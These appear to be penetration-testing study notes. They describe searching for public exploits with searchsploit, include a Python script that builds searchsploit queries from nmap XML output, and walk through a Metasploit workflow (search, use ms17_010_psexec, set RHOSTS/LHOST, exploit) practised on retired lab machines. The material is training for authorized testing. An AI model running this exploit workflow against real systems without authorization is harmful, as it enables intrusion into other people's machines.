- after identifying the services and web apps running on open ports with an `nmap` scan, determine whether public exploits exist for those services and web apps
# Public Exploit/Vuln Tools
- google search
- `searchsploit` searches a local copy of the Exploit-DB database of exploit PoCs; it is part of the `exploitdb` package
- `sudo apt install -y exploitdb`
- `searchsploit openssh 7.2` ![[images/Pasted image 20250822083851.png]]
- other online databases for exploit/vuln research:
- Exploit-DB
- Rapid7 vulnerability & exploit DB
- Vulnerability Lab
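The step in the first bullet (nmap service versions in, `searchsploit` queries out) can be automated. The script below is an added example, not part of these notes or of the `exploitdb` project: it parses `nmap -sV -oX` XML, keeps only open ports with a fingerprinted product, shortens the banner version to `major.minor` (the broad query style of `searchsploit openssh 7.2`), and emits one `searchsploit -t` command per service (`-t` limits matching to exploit titles, so a generic word like `http` does not hit every file path). The XML sample and the host `10.10.10.5` are constructed for the demo. The same mapping is what vulnerability-management triage does when deciding which patch to apply first; `searchsploit --nmap scan.xml` performs a similar lookup internally, this version just makes the queries visible and reviewable.

```python
"""Build searchsploit queries from an nmap -sV XML scan (added example)."""
import re
import shlex
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -oX scan.xml` output; not a real scan.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.10.10.5">
  <host>
    <status state="up"/>
    <address addr="10.10.10.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.2p2 Ubuntu 4ubuntu2.8"
                 extrainfo="Ubuntu Linux; protocol 2.0"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.18" extrainfo="(Ubuntu)"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="filtered"/>
        <service name="microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="open"/>
        <service name="http-proxy"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def short_version(version):
    """Reduce a banner version such as '7.2p2 Ubuntu 4ubuntu2.8' to 'major.minor'
    ('7.2'). Returns '' when nmap reported no version at all."""
    m = re.match(r"(\d+\.\d+)", version or "")
    return m.group(1) if m else ""


def parse_open_services(xml_text):
    """Return [(host, port, product, short_version)] for open ports whose
    service has a product name. Ports that are not open, or that -sV could
    not fingerprint (no product attribute), are skipped: a bare service
    name like 'http-proxy' gives nothing useful to search for."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            if svc is None or not svc.get("product"):
                continue
            found.append((addr, int(port.get("portid")),
                          svc.get("product"), short_version(svc.get("version"))))
    return found


def searchsploit_queries(services):
    """One `searchsploit -t <product words> <major.minor>` command per service.
    Product words are lowercased and shell-quoted so a banner can never
    inject extra shell syntax into the generated command line."""
    cmds = []
    for _host, _port, product, ver in services:
        terms = product.lower().split() + ([ver] if ver else [])
        cmds.append("searchsploit -t " + " ".join(shlex.quote(t) for t in terms))
    return cmds


if __name__ == "__main__":
    for (host, port, product, ver), cmd in zip(
            parse_open_services(SAMPLE_NMAP_XML),
            searchsploit_queries(parse_open_services(SAMPLE_NMAP_XML))):
        print(f"{host}:{port} {product} {ver or '(no version)'} -> {cmd}")
```

Replace `SAMPLE_NMAP_XML` with the contents of a real `-oX` file to use it; review the printed commands before running them, since a too-broad query (product only, no version) returns far more candidates than are relevant to the observed version.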
# Metasploit Framework (MSF) Primer
- contains built-in exploit modules for many public vulns and provides an easy way to use them against vulnerable targets
- other features:
- recon scripts to enumerate remote hosts and compromised targets
- verification scripts to test the existence of a vuln without compromising a target
- `meterpreter` - an advanced payload that provides an interactive shell for running commands on compromised targets
- post-exploit and pivoting tools
- `msfconsole` launches an interactive sub-shell for the MSF ![[images/Pasted image 20250822192548.png]]
- once MSF is running, we can search for modules matching the target app with the `search` command, e.g. `search exploit <pattern>` ![[images/Pasted image 20250822192717.png]]
- able to supply complex filters such as `cve:2009 type:exploit`
- pull/select an exploit from MSF's db with the `use` command
- `use exploit/windows/smb/ms17_010_psexec` ![[images/Pasted image 20250822195013.png]]
- before we can run the exploit, its options need to be configured; `show options` lists them ![[images/Pasted image 20250822194955.png]]
- shows which options are marked required and must be set before the exploit will run
- `RHOSTS` = IP of target(s)
- `RPORT` = target port
- `LHOST` = IP of attacker machine
- `FILEPATH` = path to file to read
```bash
# MSF sequence
msfconsole                      # launch MSF in an interactive sub-shell
search exploit <pattern>        # search modules; accepts filters such as cve:2009 type:exploit
use <exploit_name or index>     # select an exploit by full name or by its number in the search results
show options                    # list the options (required ones must be set before the exploit can run)
set RHOSTS <target_IP>
set RPORT <target_port>
set LHOST tun0                  # set attacker IP to the VPN tunnel interface facing the target
check                           # tests whether RHOSTS are vulnerable without exploiting them (if the module supports it)
exploit                         # run the exploit against RHOSTS
```
- retired boxes for practicing MSF
- Granny/Grandpa
- Jerry
- Blue
- Lame
- Optimum
- Legacy
- Devel